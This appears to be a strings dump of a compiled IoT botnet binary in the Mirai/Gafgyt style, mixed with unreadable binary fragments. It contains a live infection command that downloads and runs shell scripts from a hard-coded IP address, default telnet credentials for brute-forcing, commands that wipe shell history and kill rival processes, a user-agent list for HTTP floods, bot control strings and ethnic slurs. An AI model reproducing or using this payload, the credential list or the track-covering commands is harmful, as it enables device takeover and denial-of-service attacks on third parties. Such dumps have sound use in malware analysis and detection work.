78	y
=)<o8	
:} J
:} J
:} J
}a[xN
9@I^
:} J
Cx= 
}@Sx= 
}`HP= 
:} J
:} J
}a[xN
HP|	
HP|	
}a[xN
}a[xN
}a[xN
}a[xN
>} KxT
9)l<
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
}a[xN
}a[xN
}a[xN
x}d[x}%KxK
}a[xN
:}#Kx8
8ilD= 
}a[xN
x}%KxH
x}$Kx8
}a[xN
}a[xN
9)lPT
:} J
}a[xN
}c[x|
}c[x|
}a[xN
}a[xN
}a[xN
8ipP8
x}$KxH
}a[xN
8ipP8
}a[xN
} HP
}a[xN
:} J
H0}`
x}$Kx8
}f[x}GSxH
:} J
H0}`
x}$Kx8
}f[x}GSxH
x}$Kx8
}a[xN
}a[xN
}a[xN
:} J
H0}`
x}$Kx8
}g[xH
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
}c[x|
:} J
H0}`
}%Kx8
A Santa lives evil at NASA
}g[xH
x}'KxH
}a[xN
:|	KxU
:}@Sx|
}@SxT	
}a[xN
}a[xN
8	pt
} HP
} HP
} HP
} HP
} HP
}a[xN
:} J
H0}`
x}$Kx8
}g[xH
}a[xN
}a[xN
>} Kx|
}a[xN
}a[xN
HP|	
} XP
}a[xN
}a[xN
}a[xN
}CSx|
x}e[xH
}a[xN
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
9	p|= 
>}CSx}
;x}g[x|
}a[xN
:} J
:} J
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
9	p|= 
Borrow or rob
>}CSx}
;x}g[x|
}a[xN
:} J
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
9	p|= 
>}CSx}
;x}g[x|
}a[xN
:} J
:} J
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
9	p|= 
>}CSx}
;x}g[x|
}a[xN
:} J
:} J
:} J
>p} 
p}`XP
} HP
9	p|= 
>}CSx}
;x}g[x|
}a[xN
}a[xN
}a[xN
u1|`
}#Kx8
:} J
sy|`
8	qT}+
8	qT}k
ji|`
x}$Kx8
:} J
H0}`
}%Kx8
}g[xH
n)|`
}&Kx}g[xH
}c[x
:} J
:} J
}c[x
j}|`
:} J
:} J
}c[x
:} J
:} J
:} J
:} J
}FSx}
x}i[xL
:} J
:} J
:} J
}FSx}
Cx}h[xL
x}%Kx8
}c[x
4}c[x|
:} J
:} J
}e[x}FSx|
:} J
:} J
}e[x}FSx|
:} J
:} J
q,}e[x}FSx|
}a[xN
8	qx
x}%KxH
x}%KxH
x}%KxH
x}%KxH
8	i|
x}%KxH
8	ip
x}%KxH
x}%KxH
x}%KxH
x}%KxH
x}%KxH
8	r$
x}%KxH
8	r8
x}%KxH
8	rL
x}%KxH
8	r`
x}%KxH
8	rt
x}%KxH
x}%KxH
x}%KxH
}a[xN
}a[xN
}a[xN
x}e[x8
xq|`
x9|`
}m|`
>}c[x|
}'Kx9
~=|`
~	|`
Do nine men interpret Nine men I nod
>}c[x|
R]|`
}a[xN
|1|`
{m|k
x}e[x8
x)|`
rm|`
r5|`
qU|`
>}c[x|
}'Kx9
>}c[x|
}a[xN
vU|`
x}e[x8
li|`
ky|`
kA|`
k	|`
p=|`
ra|`
>}c[x|
Fu|i
}'Kx9
>}c[x|
E!|`
}a[xN
sY|`
}CSx|
x}e[xH
}#Kx|
x}e[xH
$} HP
Ca|k
}CSx|
x}e[xH
}#Kx|
x}e[xH
0} HP
nA8`
lA|`
oe|`
qi|`
@!|i
}'Kx9
}M|`
x}e[x8
hM|`
>}c[x|
}'Kx9
{)|`
{	|`
g]|`
>}c[x|
}a[xN
yq|`
d=|k
x}e[x8
[=|`
Z]|`
u]|`
u%|`
ay|`
Tacocat
>}c[x|
}'Kx9
tE|`
t1|`
t!|`
>}c[x|
}a[xN
(}#Kx|
x}e[xH
:} J
x,}FSx}
x}j[xL
}FSx}
Cx}h[xL
:} J
}e[xL
}a[xN
}a[xN
4}#Kx|
x}e[xH
UV}i
p}`XP
} HP
.p} 
p}`XP
A} HP
x}h[xL
>}#Kx|
TA|i
x}%KxH
0m|`
}a[xN
T}f[xL
}a[xN
RQ|`
,	|`
)}|`
PM|`
t}|i
tY|i
t5|i
su|`
sY|`
,a)B@
La|`
$e8`
L}|`
q}|i
qY|i
q5|i
pi|`
pM|`
ne|i
nA|`
m}|`
M5|`
kq|`
kE|`
Je|`
hu|`
hI|`
GA|`
A=|`
?A|`
dA|`
d!|`
D	|`
b}|`
ba|`
BU|`
<a|`
d}8`
}a[xN
:} J
}c[x|
E%|`
x}$Kx
}a[xN
Au|`
x}%KxH
x}$KxH
}a[xN
}a[xN
}a[xN
6]|`
5E|`
}e[x}FSxL
x}$KxH
,!|`
;q||
:|	KxU
:}@Sx|
2E|i
.]|`
-1|`
oA|`
+q= 
x}$Kx
x}$KxK
Iu= 
T}e[xL
,A|i
x}$KxH
x}$Kx8
}#Kx}e[x8
=!|~
D|cJ.Tc
O]=`
H89)
}kSxU) 6}kKxW
+x|}
}#Kx
#x~#
H@}j[x@
XP= 
:9):h|	
sx|	
`HP/
PY|~
<}+Kx9)
	X@A
<}+HP})
p})Z
:}(R
}_Sx/
 }	Z
}_SxH
}KSx; 
}KSx
$})XP/
}i8P/
8})PPU)
<})Z
H8= 
 }j[x})
XP= 
9):@T
}y[xWi
d}<KxH
39= 
2E= 
#x9c
QJD.QJ
}H2x9k
}JZx9)
@x9#
}#KxN
}c[xN
}CSxN
} @9A
(P5%
}	CxH
}#Kx|h
}+Kx`
} 899+
}ISxH
}#Kx|h
} HP;
<})R
}#KxN
@,|}
8P|i
D}#Kx
H81 
 0})
8}kH0!)
0} HP9K
}kP0}*HPU`
~|kH./
0}iY.
Cx}(KxH
|i.pTk
}	A.
8}):
P09k
:}):
x}):
P}CJ
}#I.H
:} KxA
}+HP|
x9):
,}8XPU@
<}?J
D}xHP
x}9J
}#HP})[
}%XP
l}(:
CxU$
:9g:
}*X.`
}#@P
:9):
t}'R
|c@P|
:}iC
}+HPU)
:}#J
}#Kx8!
Nm})
9)09U)
}FSx}i
|`HQ@
4}#Kx
}a[xN
= puT
$}#Kx
B@}c
} HP
}+HP
p}~[x
 %= 
}iXP}<Kx}
}+HP}|[x}?
9)!T/
4}#Kx
t}#Kx
}KH.
}HKy
}#KxH
}#KxH
3x8!
+x|~
#xc{
P} HP
@}l;
`P}l[x}`
})0P}kJ
8}@J
}h0P
})PP|
(}~*
4}JQ
}FHP
}KPP
4}+PP
})XP|
}`(P
#x9k
Jx=i~
})Zx}
Hy9#
}#KxN
}c[xN
}CSxN
#x9k
Jx9C
})Zx9c
Hy9#
}#KxN
}c[xN
}CSxN
}H2x9k
}JZx9)
@x9#
}#KxN
}c[xN
}CSxN
}CSxN
<|	B.p	
<})B.q?
Cx}<Kx|x
Cx}(KxH
#x|}
#x|}
#x|}
+x|w
}}[x
}#Kx
}a[xN
}@PPq`
p}J`
Jx=i~
})Zx}
Hy9#
}#KxN
}CSxN
}c[xN
 6}7
}i@P}I
d}h[x9k
} HP9)
(}h[xH
 }*#
} HP9)
} HP8
D}#Kx
Uk@.}kKxT
}i[x;
}<Kx
x}<Kx/
}#Kx
}|[x:
: = 
XP}*
SxU)@.U
@.}kKx|
}6HP
J.p	
+:$H
|kH.K
:|iY.
|kH.K
x}g[x8`
HP;x
}#Kx
}DSx
})SxUk
<}kKx|
@.})
$}>Kx
Cx}WSx; 
Vs >~`
x|}Z
195.62.53.138
cd /tmp ; wget http://195.62.53.138/ass.sh; curl -O http://195.62.53.138/ass.sh; chmod 777 ass.sh; sh ass.sh; tftp 195.62.53.138 -c get tfft1.sh; chmod 777 tfft1.sh; sh tfft1.sh; tftp -r tfft2.sh -g 195.62.53.138; chmod 777 tfft2.sh; sh tfft2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.62.53.138 hoe1.sh hoe1.sh; sh hoe1.sh; rm -rf ass.sh tfft1.sh tfft2.sh hoe1.sh; rm -rf *
telnet
root
admin
1234
123456
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
ogin
sername
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
busybox
peenis
Dope*
mips
mipsel
i686
i586
jack*
hack*
arm*
tel*
lol*
busybox*
badbox*
DFhxdhdf
dvrHelper
FDFDHFC
FEUB
FTUdftui
GHfjfgvj
jhUOH
JIPJIPJj
JIPJuipjh
kmyx86_64
lolmipsel
RYrydry
TwoFace*
UYyuyioy
wget
x86_64
XDzdfxzf
badbox
Mirai*
mirai*
cunty*
IoT*
jackmy*
hackmy*
busyboxterrorist
xxb*
hackz
bin*
gtop
tftp*
botnet
swatnet
ballpit
fucknet
cracknet
weednet
gaynet
queernet
ballnet
unet
yougay
sttftp
sstftp
sbtftp
btftp
y0u1sg3y
bruv*
love*
kmy*
pl0x*
kittyphones
pftp
httpd
telnetd
(null)
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
:>%$#
%d.%d.%d.%d
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve
>%s.t && cd %s ; >retrieve
[1;37m| INFECTION SUCCESS - %s:%s:%s
TELNET %s:23 %s:%s
[1;31m| FAILED TO INFECT - %s:%s:%s
lMIPS
GET %s
ARCH_MIPS
MIPSEL
ARCH_MIPSEL
ARCH_SH4
ARCH_X86_64
ARCH_I5
ARCH_I6
ARCH_PPC
m68k
ARCH_M68K
sparc
ARCH_SPC
ARMv4
ARCH_ARMv4
ARMv5
ARCH_ARMv5
ARMv6
ARCH_ARMv6
E-EB
ARCH_4E-EB
ARMv4T
ARCH_ARMv4T
ARCH_I4
ARCH_M64
ARMv7
ARCH_ARMv7
GET *
Failed opening raw socket.
arfgG
HBiug655
KJYDFyljf754
LIKUGilkut769458905
JHFDSkgfc5747694
GJjyur67458
RYSDk747586
HKJGi5r8675
KHGK7985i
yuituiILYF
GKJDghfcjkgd4
uygtfgtrevf
tyeuhygbtfvg
ewqdcftr
trbazetghhnbrty
tbhrwsehbg
twehgbferhb
etrbhhgetrb
edfverthbyrtb
kmiujmnhnhfgn
zcdbvgdfsbgfd
gdfbtsdgb
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
smack
cunts
nwonknu
unknown
hello
slammed
Linux
Machines
Dank
Layer4
hhfdhkhbhcace
ugiydg
IOHEDU9S
SIAHDIYSGBILC
DSFDD
DVAS
EFFAESF
uhdusaibxi
OIEDNBOUBAS
WQIJOIWENASO
pkpinasoubc
wubihbdc
inopxuob
wubiddsd
savduhvaU
UHyig732vgux
UByovoouds
saybuyyyywugav
sdjbciysvhdaocu
dsibciwveas
dsygc8y32723
tydjtr
tfkyt
rsyreg
HCKG
uibeiubf
YRXDJR
YIFUKT
YCJYRX
7TUFF
dsgdf
idsh
gffag
gfdag
fgadf
fbafdb
fbbbf
dfbdfb
fdbxb
Failed setting raw headers mode.
Invalid flag "%s"
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
pkill -9 %s
history -c;history -w
cd /root;rm -rf .bash_history
cd /var/tmp; rm -f *
close
keep-alive
accept
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable
Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38
Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Mozilla/5.0 (X11; CrOS x86_64 9592.96.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.114 Safari/537.36
Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G930W8 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 535) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393
Mozilla/5.0 (Linux; Android 4.4.4; HTC Desire 620 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Mozilla/5.0 (Linux; Android 5.0; HUAWEI GRA-L09 Build/HUAWEIGRA-L09) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
yX%s %s HTTP/1.1
Connection: %s
Accept: */*
User-Agent: %s
PONG!
TABLE
UPDATE
UPDATE TAKEN SUCCESFULLY
TELSCAN
STOPPING SCANNER
NIGGERKILL
GETPUBLICIP
My Public IP: %s
HTTP
KILLATTK
Killed %d.
None Killed.
KILLME
ima dup nigga
8.8.8.8
/proc/net/route
	00000000	
ROUTER
hicore
/etc/rc.d/rc.local
/etc/rc.conf
"%s%s"
fork failed
[1;37mConnected 
[1;36m%s-:-%s
PONG
%s 2>&1
@(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
/bin/sh
 Nnk(A 
0123456789abcdef
/etc/resolv.conf
nameserver
domain
search
options
timeout
attempts
/etc/hosts
S[kA
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
Eleele
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.data
.sdata
.sbss
.bss
.comment
initfini.c
libc/sysdeps/linux/powerpc/crti.S
crtstuff.c
__do_global_dtors_aux
call___do_global_dtors_aux
frame_dummy
call_frame_dummy
__EH_FRAME_BEGIN__
__CTOR_LIST__
__DTOR_LIST__
p.5432
__JCR_LIST__
completed.5434
object.5449
__do_global_ctors_aux
call___do_global_ctors_aux
__JCR_END__
__CTOR_END__
__DTOR_END__
__FRAME_END__
libc/sysdeps/linux/powerpc/crtn.S
libc/sysdeps/linux/powerpc/crt1.S
better5.c
i.4741
printchar
prints
printi
print
fdopen_pids
hextable
ipState
C.394.7663
C.397.7702
C.444.8046
C.455.8095
C.454.8094
ioctl.c
libc/sysdeps/linux/powerpc/vfork.S
__syscall_fcntl.c
_exit.c
chdir.c
close.c
dup2.c
fork.c
getcwd.c
getdtablesize.c
getpagesize.c
getpid.c
getrlimit.c
kill.c
open.c
pipe.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
